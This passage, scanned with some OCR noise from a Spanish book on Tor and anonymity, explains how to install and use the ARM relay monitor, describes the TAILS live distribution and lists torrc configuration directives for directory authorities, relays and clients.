en Debian o descargar directamente el programa desde el siguiente enlace: http://www.atagar.com/ 
arm/download.php 


Una vez descargado y descomprimido el fichero “ tar.gz ” que contiene el software, se procede a 
ejecutar el script “ setup.py” para instalar ARM. 


>python setup.py - 
Standard commands: 
build 
build_py 
build_ext 
build_clib 
build_scripts 
clean 
install 
install_lib 
install_headers 
install_scripts 
install_data 
sdist 
register 
bdist 
bdist_dumb 
bdist_rpm 
bdist_wininst 
upload 
check 


-help-commands 

build everything needed to install 

"build" pure Python modules (copy to build directory) 

build C/C++ extensions (compile/link to build directory) 

build C/C++ libraries used by Python extensions 

"build" scripts (copy and fixup #! line) 

clean up temporary files from 'build' command 

install everything from build directory 

install all Python modules (extensions and pure Python) 

install C/C++ header files 

install scripts (Python or otherwise) 

install data files 

create a source distribution (tarball, zip file, etc.) 
register the distribution with the Python package index 
create a built (binary) distribution 
create a "dumb" built distribution 
create an RPM distribution 

create an executable installer for MS Windows 
upload binary package to PyPI 
perform some checks on the package 


usage: setup.py [global_opts] cmdl [cmdl_opts] [cmd2 [cmd2_opts] ...] 
or: setup.py —help [cmdl cmd2 ...] 
or: setup.py —help-commands 
or: setup.py cmd -help 
>python setup.py install 


Despues de instalar el programa se puede comenzar a usarlo ejecutando el comando “arm” desde 
consola, de este modo se podra ver informacion de la instancia de Tor correspondiente a: 

- Figerprint de la instancia. 

- Nickname de la instancia. 

- Numero de bytes compartidos y consumidos. 

- Recursos utilizados por la instancia (memoria, CPU). 

- PID de la instancia. 

- Tiempo que lleva activa la instancia. 

- Reporte en tiempo real. 

Menu de opciones muy completo para controlar el servicio de TOR y las conexiones 
establecidas. 
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Imogen 04.24: lnterfaz de ARM para controlar una instancia de Tor. 

Antes de comenzar a utilizar la herramienta ARM, es necesario que la instancia de Tor tenga habilitado 
el puerto correspondiente al protocolo de control, el cual se indica en la propiedad de configuration 
“ ControlPort" que se incluye en el fichero “tome”. Esto evidentemente es obligatorio, ya que esta 
opcion permite que clientes externos (como en este caso ARM) puedan establecer una conexion 
con la instancia y posteriormente ejecutar consultas siguiendo la especificacion del protocolo de 
control, tal como se ha visto en parrafos anteriores. Por otro lado, tambien se recomienda definir 
las opciones “HashedContmlPassworcT o “CookieAuthentication” con el fin de no permitir que 
cualquier cliente se pueda conectar a la instancia. En el caso de que estas opciones se declaren en el 
fichero de configuracion “torre”, cuando se inicie ARM Io primero que solicitara la instancia sera la 
contrasena de acceso al servicio. 

Las opciones disponibles en ARM se pueden consultar con el interrupter “-h”, tal como se puede 
ver a continuation: 


>arm -h 

Usage arm [OPTION] 

Terminal status monitor for Tor relays. 


-g , 

-p, 

-i, 

-s, 

-c, 

-d, 

-b, 

-e, 


—gui 
—prompt 

—interface [ADDRESS:]PORT 
—socket SOCKET_PATH 

—config CONFIG_PATH 

—debug 
—blind 

—event EVENT_FLAGS 

d DEBUG a ADDRMAP 


launch the Gtk+ interface 
only start the control interpreter 
change control interface from 127.0.0.1:9051 
attach using unix domain socket if present/ 
SOCKET_PATH defaults to: /var/run/tor/control 
loaded configuration options, CONFIG PATH 
defaults to: /home/adastra/.arm/armre 
wr ites all arm logs to /home/adastra/.arm/log 
disable connection lookups 
event types in message log (default: N3) 
k DESCCHANGED s STREAM 
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-V, 

-h. 


i INFO f AUTHDIR_NEWDESCS 

n NOTICE h BUILDTIMEOUT_SET 

w WARN b BW 

e ERR C CIRC 

j CLIENTS_SEEN 
DINWE tor runlevel+ 

12345 arm runlevelt 
67890 torctl runlevel+ 


g GUARD 
1 NEWCONSENSUS 
m NEWDESC 
p NS 
q ORCONN 
A All Events 


r STREAM_BW 
t STATOS_CLIENT 
u STATUS_GENERAL 
v STATUS SERVER 


X No Events 
U Unknown Events 


—version provides version information 

—help presents this help 


Example: 

arm -b -i 1643 hide connection data, attaching to control port 1643 

arm -e we -c /tmp/cfg use this configuration file with 'WARN'/'ERR' events 

Como puede apreciarse, el valor por defecto de la interfaz de control es 127.0.0.1:9051, sin embargo 
si es necesario cambiar estos valores por defecto, se puede establecer el interruptor “-i” con una 
interfaz de red o puerto distintos a los valores por defecto. 

El funcionamiento de ARM es complemente interactive y muchas de las opciones que definen el 
comportamiento de la herramienta pueden ser cambiadas posteriormente desde la propia herramienta 
en estado de ejecucion. Las opciones disponibles en la aplicacion son simples: 

m: menu, p: pause, h: page help, q: quit 

En el panel superior de la interfaz se puede apreciar datos relacionados con el repetidor y las politicas 
que tiene asociadas, asi como tambien se puede apreciar information general como la version de 
Tor, el tiempo que lleva en ejecucion, la carga de la maquina y el fingerprint del servicio. En la 
zona central se puede apreciar el trafico de subida y de bajada y finalmente en la parte inferior de la 
pantalla se pueden ver las trazas relacionadas con los eventos ADDMAP (a), NOTICE (n) y INFO 
(i) estos valores representan la option “-e am' del comando “arm" ejecutado. 



Imogen 04.25: Menu principal de ARM. 
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Las opciones que se incluyen en este menu se indican a continuacion: 

Actions: 

- Close Menu: Cierra el Menu. 

- New Identity: Crea un nuevo circuito para cambiar la direction de origen de las peticiones. 
Stop TOR: Detiene la instancia. 

- Reset TOR: Reinicia la instancia. 

- Setup Wizard: Asistente encargado de configurer la instancia de Tor, habilitando opciones 
muy similares a las disponibles en Vidalia, tales como crear un repetidor intemo o extemo, 
un puente o un cliente simple. 

- Pause: Pausar el grafico en tiempo real y los logs ensenados en ARM 
Exit: Salir del Programa. 


En el menu View se puede acceder a otras vistas tales como las conexiones que se encuentran 
establecidas desde la instancia de Tor, el valor de cada una de las opciones de configuracion de la 
instancia y el contenido del fichero “torrc”. 


arm - Galilei (Linux 3.13.0-63-generic) Tor 0.2.6.10 (recommended) 

Jnnamed - 82.158.83.164:9001, Control Port ( ): 9051 

cpu: 0.0% tor, 1.2% arm mem: 64 MB {0.4%) pid: 29186 uptime: 

fingerprint: 2CDD44F1F164D00D3B234A002D1192B606633FAB 
flags: none 

aage 3 / 5 - m: menu, p: pause, h: page help, q: quit 


Tor Configuration (press ’a‘ to show all options): 


oanawiainKate (General. Option) 

Value; 1GB (default, DataSize, usage: N bytes|KBytes|MBytes|GBytes|KBits I MBits I GBits) 
description: A token bucket limits the average incoming bandwidth usage on this node 
to the specified number of bytes per second, and the average outgoing bandwidth 
usage to that same value. If you want to run a relay in the public network this 
needs to be at the very least 30 KBytes (that is, 30726 bytes). (Default- i GByt 


BandwidthRate 


BandwidthBurst 
RelayBandwidthRate 
RelayBandwidthBurst 
ControlPort 
HashedControlPassword 
CookieAuthentication 
DataDirectory 
Log 


1 GB 
0 B 
0 B 
9051 
<none> 

False 

/home/adastr.. 
notice file... 


Average bandwidth usage limit 


Maximum bandwidth usage limit 

Average bandwidth usage limit for relaying 

Maximum bandwidth usage limit for relaying 

Port providing access to tor controllers... 

Hash of the password for authenticating... 
If set, authenticates controllers via a... 

Location for storing runtime data... 
Runlevels and location for tor logging 


Imogen 04.26: Configuracion de la instancia de Tor desde ARM. 


Finalmente, ARM tiene una interfaz visual un poco mas refinada utilizando la option “-g” o “—gw/”, 
la cual se basa en GTK para cargar todos los elementos visuales e incluye las mismas opciones que 
se han explicado en los parrafos anteriores. Para utilizar este modo, es necesario instalar la libreria 
“ cagraph ”. 


4.3.4 TAILS (The Amnesic Incognito Live System) 

Se trata de una distribution basada en Debian que contiene varias herramientas configuradas y 
enfocadas a proteger la identidad del usuario y sus datos personales. Entre las herramientas que 
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incluye se encuentran Tor Browser y algunas herramientas criptograficas que permiten el cifrado 
de documentos y generation de claves. TAILS puede ejecutarse como Live CD o Live USB, lo que 
quiere decir que no es necesario instalarlo directamente en el disco duro del ordenador, simplemente 
es necesario montar la imagen ISO y dejar que arranque por si solo cuando se enciende la maquina. 


A continuation se indican algunas de las caracteristicas mas llamativas en TAILS. 

- Se puede ejecutar desde VirtualBox como maquina virtual y de esta manera probar sus 
funcionalidades. 


- Se basa en Debian. 

- No escribe absolutamente nada en disco y todos los documentos o information almacenada 
desaparecera despues de un nuevo reinicio. 

- TAILS obliga a que todas las conexiones viajen por medio de Tor utilizando protocolo 
TCP. 


- Trae Tor Browser configurado con algunos plugins y extensiones adicionales. 

- Incluye I2P, aunque no se encuentra configurado por defecto cuando arranca. 

Teclado virtual para ingresar datos sensibles como usuarios y contrasenas, siendo una 
buena medida contra keyloggers y otras herramientas de monitoreo. 

- Incluye herramientas como Trucrypt, Claws Mail, OpenPGP, KeePassX, GtkHash, 
Keyringer, entre otras. 



Imogen 04.27: Tor Browser en TAILS. 


TAILS tambien permite establecer una configuration personalizada, en donde se pueden establecer 
detalles como una contrasena para el usuario “root”, modification de la direction MAC, configurar 
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la forma en la que se establece la conexion hacia Internet en el caso de que exista algun proxy o 
algun mecanismo restrictive, etcetera. 



Imogen 04.28: Configuracion personalizada de TAILS. 


Desde la configuracion personalizada tambien es posible activar el camuflaje Windows, lo que 
habilitara una interfaz grafica muy similar a la que tiene Windows 8. 

TAILS es probablemente la mejor distribution relacionada con el anonimato, no obstante su uso 
significa que todas las comunicaciones y todas las tareas realizadas con TAILS sean realmente 
anonimas, existen una serie de advertencias sobre su uso que cada usuario debe leer y comprender 
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correctamente antes de comenzar a utilizar esta distribution. Dichas recomendaciones se encuentran 
disponibles en el siguiente enlace: https://tails.boum.org/doc/about/warning/index.en.html 



Imogen 04.29: Camuflage de Windows 8 en TAILS. 

Existen otras distribuciones muy similares a TAILS, a continuation se listan algunas: 


- JanusVM: http://www.janusvm.com/ 

- Privatix: http://www.mandalka.name/privatix/doc.html.en 

- Ubuntu Privacy Remix (UPR): https://www.privacy-cd.org/ 


4.3.5 Directivas de configuration 

Despues de explicar el fiincionamiento intemo de Tor, se procede a describir algunas de las opciones 
que pueden indicarse en el fichero de configuration maestro de cualquier instancia (“torrc”). 

4.3.5.1 Directivas relacionadas con caches y autoridades de directorio 

DirPort: El uso de esta option indica que en el puerto especificado se iniciara un servicio de 
directorio. 

Dir Listen Address: Indica la interfaz de red y puerto en el que se iniciara un servicio de directorio. 

DirPortFrontPage: Esta option recibe como parametro un fichero HTML que sera establecido en 
la raiz del directorio Tor. Es obligatorio que se encuentre establecida la option “DirListenAddress” 
o “ DirPort ” con un valor mayor 0. Se espera que el contenido del documento HTML establecido en 
esta propiedad contenga el “ disclaimer ” del servicio de directorio. 
















210 


Deep Web: TOR, FreeNet & I2P - Privacidady Anonimato 


AuthoritativeDirectory: Cuando esta opcion se encuentra activada, indica que la instancia actuara 
como una autoridad de directorio en lugar de una cache de directorio. De este modo generara 
su propio listado de servidores validos y descriptores. Normalmente antes de hacer esto se debe 
contactar con los demas administradores de las autoridades de directorio existentes escribiendo un 
correo a tor-ops@torproject.org de otro modo, sera ignorado por todos los clientes en la red. 

VlAnthoritativeDirectory: Cuando se utiliza con la opcion “ AuthoritativeDirectory ” 

automaticamente se genera una autoridad de directorio siguiendo el protocolo VI. (Para clientes de 
Tor con versiones 0.1.0.x). 

V2AuthoritativeDirectory: Cuando se utiliza con la opcion “ AuthoritativeDirectory ” 

automaticamente se genera una autoridad de directorio siguiendo el protocolo V2. (Para clientes Tor 
0.1.1.x y 0.1.2.x). 

V3AuthoritativeDirectory: Cuando se utiliza con la opcion “ AuthoritativeDirectory ” 

automaticamente se genera una autoridad de directorio siguiendo el protocolo V2. (Para clientes 
Tor 0.2.0.x). 

DirPolicy: Permite establecer las politicas de aceptacion para limitar quienes se pueden conectar al 
servicio de directorio. La sintaxis de estas politicas es igual a las que se pueden definir en la opcion 
“ ExitNodes ”. 

VersioningAuthoritativeDirectory: Cuando esta opcion se encuentra activada (valor 1) indica las 
versiones de Tor que aun son consideradas como seguras para el uso del directorio publicado. Debe 
venir acompanada de una de las opciones “ Recommended que se explican a continuation. 

RecommendedVersions: Se trata de un listado de cadenas separadas por coma que enumera las 
versiones de Tor que son consideradas seguras y estables. Esta opcion puede establecerse en 
multiples ocasiones en el mismo fichero de configuration y en todos los casos, siempre debe venir 
acompanada con la opcion “ VersioningAuthoritativeDirectory ” activada. 

RecommendedClientVersions: Funciona igual que “RecommendedVersions”, solamente 

que aplica para los clientes de la autoridad. Su valor no es utilizado cuando se establece 
tambien la opcion “ RecommendedVersions ”. Siempre debe venir acompanada con la opcion 
“ VersioningA uthoritativeDirectory” activada. 

RecommendedServerVersions: Funciona igual que “RecommendedVersions”, solamente 

aplica para las caches y autoridades de directorio. Su valor no es utilizado cuando se establece 
tambien la opcion “RecommendedVersions”. Siempre debe venir acompanada con la opcion 
“VersioningAuthoritativeDirectory ” activada. 

V3AuthVotingInterval: Numero de minutos predefinidos para el intervalo de cada voto. Es 
importante anotar que este valor es elegido por parte de todas las autoridades de directorio, las 
cuales se ponen de acuerdo para ello. Por ejemplo, actualmente el intervalo inicial comienza a las 
00:00 y posteriormente las 24 horas del dia son divididas con el valor de esta propiedad. El valor por 
defecto son 60 minutos. 
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V3AuthVoteDelay: Configuracion del tiempo definido en minutos entre la publicacion del voto de 
la autoridad y la recoleccion de los votos de las demas autoridades. El valor de esta propiedad es 
equivalente a la variable VOTESECONDS indicada anteriormente en este capitulo. El valor por 
defecto es de 5 minutos. 

V3AuthDistDelay: Configuracion del tiempo definido en minutos para que la autoridad de directorio 
pueda publicar el consenso y asegurarse de recolectar firmas y votos de las otras autoridades. Es 
equivalente a la variable DISTSECONDS indicada anteriormente en este capitulo. El valor por 
defecto es de 5 minutos. 

V3AuthNIntervalsValid: Especifica el numero de intervalos de voto para los cuales un consenso 
determinado es valido. Es equivalente al numero maximo de documentos “ network-status ” que 
pueden ser validos en un periodo de tiempo determinado aunque no todos se encuentren ‘ ‘'frescos ”, 
es decir, el numero que se especifica en esta propiedad va a fragmentar el numero de intervalos 
existentes entre VA {ValidAfter) y VU ( Valid Until). El valor por defecto es de 3 y el valor minimo 
debe ser 2, no se recomienda establecer un valor superior a 5 ya que se incrementa el riesgo de 
particionar la red debido a la cantidad de documentos de consenso que deben descargar caches y 
clientes. 

DirReqStatistics: Cuando se encuentra activada, se encarga de escribir cada 24 horas un fichero con 
estadisticas sobre el numero de peticiones realizadas al directorio y sus correspondientes tiempos de 
respuesta. Por defecto se encuentra desactivada con valor 0. 


4.3.5.2 Directivas relacionadas con repetidores 

ORPort: Indica el puerto utilizado en la maquina local para escuchar peticiones de nuevos clientes. 
Cuando esta opcion se establece con un valor superior a 0, se le indica a Tor que debe funcionar 
como repetidor para otros clientes en la red y que puede ser usado como parte de los circuitos que 
componen otros usuarios en la red. 

ORListenPort: Funciona igual que “ ORPort ” con la diferencia de que se incluye una direction IP 
y un puerto en el cual se establecera el proceso de Tor. Esta directiva puede incluirse en multiples 
ocasiones dentro del mismo fichero de configuracion. 

AllowSingleHopExits: Con esta opcion se le indica al repetidor que el servidor puede ser usado como 
unico punto de salida de la conexion, incluso si se trata del unico enrutador en el circuito. Esto indica 
que el repetidor puede aceptar conexiones desde clientes directamente sin necesidad de que el trafico 
pase por otros nodos del circuito. Es importante anotar que no todos los clientes permiten el uso de 
este tipo de repetidores y en concreto aquellos que utilizan la opcion “ ExcludeSingleHopRelays ” 
excluiran de sus circuitos aquellos repetidores que tengan esta opcion establecida. Por defecto el 
valor es 0 (desactivada) para activarla se debe establecer el valor 1. 

AssumeReachable: Esta opcion, como su nombre lo indica, asume que el repetidor es accesible 
desde el exterior, de esta forma la prueba de accesibilidad desde Internet no se ejecuta, algo que 
siempre se lleva a cabo por defecto cuando una instancia de Tor actua como repetidor. Dado que no 
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se realizan las pruebas de accesibilidad externa del repetidor, de forma inmediata se sube el “server 
descriptor” del repetidor a las autoridades de directorio para que sea evaluado en el proximo proceso 
de votacion. 

Contactlnfo: Se trata simplemente de una direccion de correo electronico para contactar con el 
administrador del repetidor. 

Nickname: Se trata de la etiqueta del repetidor. 

MyFamily: Indica que este repetidor es administrado por un grupo u organization que ejecuta varios 
repetidores en la red de Tor. El beneficio de esto es que cuando dos repetidores hacen parte de la 
misma familia, no son empleados para construir un mismo circuito. 

NumCPUs: Numero que indica la cantidad de procesadores destinados a desciffar mensajes 
provenientes de otros nodos del circuito, el valor por defecto es 1. 

ExitPoUcy: Se trata de un concepto importante en la configuracion de cualquier repetidor, en esta 
option, que puede aparecer en multiples ocasiones a lo largo del fichero de configuracion, se deben 
definir las politicas de aceptacion o rechazo de las conexiones entrantes y salientes pasando por el 
repetidor. El formato de estas politicas es sencillo, se establece en primer lugar el tipo de politica 
“ accept/reject ” la direccion IP/Segmento red/Mascara de Red y el puerto o rango de puertos; por 
ejemplo la politica: 

"ExitPolicy accept *:80,accept *:443,accept *.22,reject *.*" 

esta aceptara todas las conexiones cuyo trafico este destinado a cualquier servidor sobre el puerto 
80,443 y 22, cualquier otra conexion por un puerto distinto sera rechazada de forma inmediata. 
Como puede apreciarse las politicas siguen un orden, teniendo preferencia las primeras que se 
especifican. En este caso concreto, las politicas de aceptacion han sido procesadas primero y han 
sido aplicadas antes que las de rechazo. 

ExitPolicyRejectPrivate: Se estable que cualquier petition cuyo trafico este destinado a una 
direccion IP interna sera rechazada. Los segmentos de red que una instancia de Tor considera locales 
son: 169.254.0.0/16, 127.0.0.0/8, 192.168.0.0/16, 10.0.0.0/8, y 172.16.0.0/12. 

Si por algun motivo se desea permitir alguna de estas redes en una politica de aceptacion se debe 
utilizar el comodin “ private ”, por ejemplo: “ExitPolicy accept private:80". Sin embargo es una 
practica poco recomendable. El valor por defecto de esta opcion es 1 (activada) y para desactivarla 
se establecera el valor 0. 

MaxOnionsPending: En esta opcion se indica el numero de “ onionskins ” o peticiones provenientes 
de otros nodos del circuito que estan encolados para ser descifrados, en el caso de que se alcance 
este limite, cualquier otra petition nueva sera automaticamente rechazada. El valor por defecto de 
esta propiedad es 100. 

Shutdown WaitLength: Se trata de un valor que le indica a la instancia que cuando recibe una seiial 
SIGINT al proceso principal, debe cerrar los circuitos que estan en estado de escucha y comenzar a 







Capitulo IV. Tor (The Onion Router) 


213 


rechazar la creacion de nuevos, posteriormente debe realizar un apagado automatico de la instancia 
de Tor. En el caso de que se reciba una segunda senal SIGINT se debe detener de forma inmediata. 
El valor por defecto de esta propiedad es de 30 segundos. 

ServerDNSResolvConfFile: Sobre escribe el fichero de configuracion DNS del sistema por el fichero 
especificado en esta opcion. Este fichero debe contener la misma sintaxis del fichero “ resolv.conf\ 
Ademas, es importante anotar que esta opcion solamente afecta a las peticiones que se realizan por 
parte del cliente y no afectan al sistema de forma global. Por defecto se usa el fichero ‘ Vetc/resolv : 
conf’ del sistema. 

ServerDNSAllowBrokenConfig : En el caso de que esta opcion se encuentre activa iniciara la 
instancia de Tor aunque el fichero de configuracion DNS se encuentre corrupto o no sea valido. La 
instancia intentara validar dicho fichero de forma periodica hasta que consiga cargarlo sin errores. 
En caso de que este desactivada, la instancia fallara en el arranque indicando que existen errores en 
el fichero de configuracion de Tor. Por defecto el valor de esta opcion es 1 (activada). 

ServerDNSAllowNonRFC953Hostname: Cuando esta opcion se encuentra desactivada, la instancia 
de Tor no intenta resolver nombres de dominios que contengan caracteres invalidos tales como 
caracteres especiales. En el caso de que se encuentre activada, permitira resolver cualquier tipo de 
nombre de dominio aunque este no sea valido. El valor por defecto es 0 (desactivada) y como todas 
las opciones relacionadas con el servidor DNS, no afectan al sistema global y solamente abarcan las 
peticiones realizadas por los clientes. 

EntryStatistics: Cuando esta opcion se encuentra activada, escribe un fichero cada 24 horas sobre el 
numero de clientes conectados de forma directa al repetidor. El valor por defecto de esta propiedad 
es 0 (desactivada). 

ExitPortStatistics: Cuando esta opcion se encuentra activada, escribe un fichero cada 24 horas sobre 
el numero de bytes retransmitidos. 

ExtralnfoStatistics: Cuando esta opcion se encuentra activada, recolecta todas las estadisticas 
y se incluyen en los descriptores “extra-info” del repetidor. Dichos descriptores, tal como se ha 
mencionado anteriormente en este capitulo, son enviados a las autoridades de directorio de la red. 
Por defecto esta opcion se encuentra desactivada (valor 0). 

4.3.5.3 Directivas relacionadas con clientes 

CirciiitBuildTimeOut: Numero de segundos que en los que el cliente esperara a que la peticion 
de construccion y apertura de un circuito se lleve a cabo. Transcurrido el tiempo especificado, 
la instancia cancelara automaticamente la construccion del circuito. El valor por defecto son 60 
segundos. Esta propiedad depende directamente de la opcion “LearnCircuitBuildTimeout”. 

LearnCircuitBuildTimeout: Esta opcion es importante ya que le permite a la instancia adaptarse 
al entomo de red en el que se encuentra. La principal caracteristica de esta opcion es que permite 
modificar de forma dinamica el tiempo que tomara la instancia antes de cancelar la construccion 
de un circuito debido a la demora. Esto quiere decir que dependiendo del conocimiento que 
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adquiere el cliente sobre el entomo de red, modificara de forma dinamica el valor de la opcion 
“CircuitBuildTimeout Admite uno de dos valores, 0 desactivada o 1 activada. Por defecto esta 
opcion se encuentra activada. Si se encuentra activada, el valor de “ CircuitBuildTimeout' servira 
como valor inicial antes de que el primer aprendizaje sea adquirido, esto significa que despues de 
que la instancia cliente recolecte information sobre el segmento de red, este valor puede ser menor 
o mayor. En el caso de que esta opcion se encuentre desactivada, el valor de “ CircuitBuildTimeout" 
sera el unico valor empleado para cancelar peticiones de construction de circuitos por demora 
(timeout). 

CircuitldleTimeout: Cuando un cliente permanece inactivo por el periodo de tiempo indicado en 
esta opcion automaticamente se cerraran los circuitos y las conexiones expiraran, esto significa 
que si por ese periodo de tiempo el cliente no utiliza un circuito construido, este se cierra y sus 
conexiones expiran. El valor por defecto es de 1 hora, sin embargo es posible que este periodo sea 
demasiado amplio y deba ser cambiado a un valor mas pequeno. 

CircuitStreamTimeOut: Esta opcion sobreescribe el valor que tiene incluida la instancia para 
planificar el numero de segundos que debe esperar antes de renunciar a un circuito y probar con otro. 
Este caso es distinto a las opciones anteriores de “ CircuitBuildTimeOut” y “ CurcuidldleTimeout ” de 
las cuales, la primera aplica cuando el circuito esta en proceso de construction y la segunda cuando 
un circuito construido deja de ser utilizado por un periodo de tiempo determinado. En esta opcion 
se indica el tiempo que se debe esperar antes de cambiar de circuito por retraso en las respuestas. 

NewCircuitPeriod: Indica el tiempo en segundos en el que se debe construir un nuevo circuito. Por 
defecto son 30 segundos. 

ExcludeNodes: Se trata de una lista de repetidores que se deben excluir en el proceso de construction 
de circuitos. Este listado puede estar compuesto por una lista de ‘ ‘fingerprints ” identificativos, 
nicknames o patrones de direcciones. Esta opcion a efectos practicos es solamente un “hint” o 
consejo que se le indica a la instancia de Tor, sin embargo si por alguna razon el cliente necesita 
conectarse a uno de los nodos indicados en esta opcion, esta habilitado para hacerlo. Por ejemplo, en 
el caso de que se intente realizar una conexion a un servicio oculto cuyos “ introduction points ” se 
encuentran excluidos utilizando esta opcion, la instancia de Tor realizara la conexion con cualquiera 
de ellos de igual forma y la directiva no tendria el efecto esperado. Para que los nodos indicados en 
esta opcion sean excluidos en todas las circunstancias y cambiar el comportamiento por defecto de 
Tor, se debe indicar tambien la opcion “StrictNodes”. 

ExcludeExitNodes: Funciona igual que la opcion “ ExcludeNodes ”, es decir, se trata de una directiva 
que le indica a la instancia de Tor que debe excluir algunos nodos del circuito que se construira, no 
obstante, esta lista solamente aplica para los nodos de salida. La instancia decidira excluir dichos 
nodos si esto no afecta su correcto funcionamiento, del mismo modo que ocurre con la opcion 
“ExcludeNodes ” explicada anteriormente. 

EntryNodes: Listado de fingerprints o nicknames que se deberan usar como primer nodo en la 
creation de circuitos. No tiene ningun efecto si se emplea la opcion “Bridge”. 

ExitNodes: Listado de fingerprints, nicknames o patrones de direcciones que se deberan usar como 
repetidores de salida de los circuitos creados por el cliente. 
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StrictNodes: Cuando se encuentra activada (valor 1), le indica a la instancia de Tor que trate a todos 
los nodos incluidos en las opciones de exclusion o inclusion de nodos como un requerimiento estricto 
que se debe seguir a la hora de construir circuitos, aunque dichas restricciones afecten el desempeno 
o incluso la funcionalidad de la propia instancia. Esto quiere decir que todos los nodos excluidos 
seran realmente excluidos de la construction de circuitos aunque esto conlleve a errores. Por otro 
lado, si esta opcion tiene el valor 0, los nodos de exclusion o inclusion seran utilizados unicamente 
cuando sea necesario y cuando no produzcan fallos. Lo anterior quiere decir que la instancia de 
Tor utilizara las politicas de exclusion o inclusion cuando no intenten excluir repetidores que son 
importantes para conectar con servicios ocultos, realizar pruebas de conectividad de un repetidor, 
actualizar o descargar information de una cache de directorio, etc. El valor por defecto es 0 y se 
recomienda no activar esta opcion a menos que se tenga muy claro lo que se esta haciendo. 

MapAddress: Con esta opcion es posible establecer que una direccion determinada sea resuelta por 
un nodo de salida concreto. Es necesario que la opcion “ AllowDoExit ’ se encuentre activada para 
que su funcionamiento sea el esperado. 

AllowDoExit: Esta opcion permite convertir las direcciones indicadas en la opcion “ MapAddress ” a 
direcciones concretas pasando por el nodo de salida especificado. Por ejemplo: “ www.google.com. 
AdastraTORY.exit” es traducida a www.google.com pasando por el nodo de salida con la etiqueta 
“AdastraTORY ’. Esta opcion se encuentra desactivada por defecto (valor 0), para activar se debe 
establecer el valor 1. 

SocksPort: Indica el puerto que utilizara Tor para iniciar un servidor SOCKS, el cual le permitira 
a los clientes realizar conexiones a traves de la red de Tor. Si el valor de esta propiedad es 0, la 
instancia de Tor no iniciara ningun servicio SOCKS en la maquina local. Si el valor es auto 
escogera un puerto aleatoriamente. Si no se especifica el valor por defecto es 9050. 

SocksListenAddress: Funciona igual que “ SocksPort ”, con la diferencia de que se puede indicar 
una intefaz de red y un puerto donde iniciar el servicio SOCKS. Esta opcion se puede utilizar en 
multiples ocasiones en el fichero “tonr” para vincular multiples puertos e interfaces. 

SocksPolicy: Permite especificar las politicas de acceso al servidor SOCKS iniciado por la instancia 
de Tor. El formato de estas politicas sigue la misma estructura que las politicas de salida que se 
establecen cuando se crea un repetidor. 

SocksTimeout: Numero de segundos que esperara el servidor SOCKS por un TCP Handshake en 
una conexion. El valor por defecto es de 2 minutos. 

SafeSocks: La instancia de Tor rechazara cualquier conexion de aplicaciones que utilicen variantes 
inseguras del protocolo SOCKS, por ejemplo aquellas que solamente proveen una direccion IP, 
lo cual indica que la aplicacion esta intentando hacer una resolution DNS. Dichas variantes son 
especificas en SOCKS4 y SOCKS5 por este motivo siempre es recomendable utilizar SOCKS4A. 
ta opcion por defecto se encuentra desactivada (valor 0), por lo tanto tambien es recomendable 
activarla (valor 1) ya que permite evitar DNS Leaks. 

TestSocks: Cuando se encuentra activada, genera un mensaje de log con nivel “notice sobre cada 
conexion que se realiza al servidor SOCKS, indicando si se trata de una conexion segura o si es 
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una variante insegura. Esta option por defecto esta desactivada (valor 0) por lo tanto tambien es 
recomendable activarla (valor 1). 

AllowNonRFC953Hostnames: Cuando esta option se encuentra desactivada bloquea cualquier 
petition que incluya un hostname invalido. Por defecto se encuentra desactivada (valor 0). 

VirtualAddrNetwork: Esta opcion pennite establecer un rango de direcciones virtuales sin asignar 
utilizadas para proveer el servicio de “proxy” a otras maquinas. Esta opcion es util para crear un 
servidor proxy de Tor transparente en el segmento de red. 

TransPort: Si es un valor superior a 0, activa el funcionamiento del servidorproxy de Tor transparente. 
Por convention se suele utilizar el puerto 9040, sin embargo se puede utilizar cualquier otro, es 
obligatorio utilizar la opcion “Virtual AddrNetwork ?’ para la creation de un rango de direcciones 
virtuales. 

TransListenerAddress: Esta opcion funciona igual que “ TransPort ”, con la diferencia que es posible 
utilizarla para establecer una interfaz de red y un puerto. 

DNSPort: Se trata de una opcion interesante dado que las instancias de Tor en sus recientes versiones 
vienen con un servicio DNS que permite resolver direcciones IP a nombres de dominio y viceversa 
de forma anonima, lo cual es sumamente util para evitar completamente DNS Leaks. El valor por 
defecto de esta propiedad es 0, no obstante se puede establecer el valor “auto” para que la instancia 
asigne automaticamente un numero de puerto para el servidor DNS o bien se puede espetificar un 
valor numerico superior a 0 para indicar cual sera el puerto empleado para iniciar el servicio DNS. 

DNSListenAddress: Funciona igual que la opcion “ DNSPort ”, solamente que permite establecer 
una interfaz de red y un puerto. El valor por defecto es: 127.0.0.1:53 

WarnPlaintextPorts: Se trata de una lista de puertos separados por coma que la instancia se 
encargara de monitorizar. Cuando se lleve a cabo una conexion utilizando alguno de los puertos de 
la lista, se generaraun mensaje de “ warning ” indicando que se esta estableciendo una conexion por 
uno de los puertos marcados. Esto es util para advertir al usuario que se hace uso de un protocolo no 
seguro, como por ejemplo Telnet y que posiblemente se esta enviando information sensible como 
credenciales en texto piano. El valor por defecto de esta opcion es: 23, 109, 110, 143. 

RejectPlaintextPorts: Funciona igual que la opcion “ WarnPlaintextPorts ” con la diferencia que esta 
opcion en lugar de advertir sobre el uso de dichos puertos, automaticamente rechazara la conexion. 


4.4 Acceso programatico 

Tor es un proyecto que tiene una comunidad de desarrolladores y entusiastas muy extensa y este 
hecho se traduce en librerias y proyectos que permiten el acceso programatico a instancias de Tor. 
En la actualidad las principales librerias y proyectos se enfocan en el uso de lenguaje Python, sin 
embargo, como se puede apreciar en el listado oficial de proyectos activos de torproject, existen 
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varios proyectos que no solamente se enfocan en el acceso programatico, sino que tambien incluyen 
herramientas que necesitan personas que prueben sus funcionalidades y detecten posibles fallos. 
Dichos proyectos se encuentran disponibles en el siguiente enlace y como se puede apreciar, algunos 
de los proyectos mencionados en la lista ya han sido detallados en este capitulo. https://www. 
torproject.org/projects/projects.html.en. 

Las principales librerias para poder crear programas que permitan la interaction con una instancia 
de Tor son “ Stem ” y “ TxTorCon ”, ambas son librerias que se han desarrollado en lenguaje Python y 
utilizan el protocolo de control de Tor, de esta forma es posible controlar de forma programatica una 
instancia de Tor y obtener detalles sobre la red. 


4.4.1 Stem 

Se trata de una de las librerias mas conocidas y utilizadas para crear programas en Python que 
se conecten y controlen una instancia de Tor. Cuenta con varias clases y funciones que permiten 
no solamente obtener information sobre una instancia de Tor, sino que tambien permite parsear 
descriptores, realizar consultas contra las autoridades o caches de directorio, crear servicios ocultos 
de forma programatica e incluso, arrancar instancias de Tor con una configuracion personalizada, 
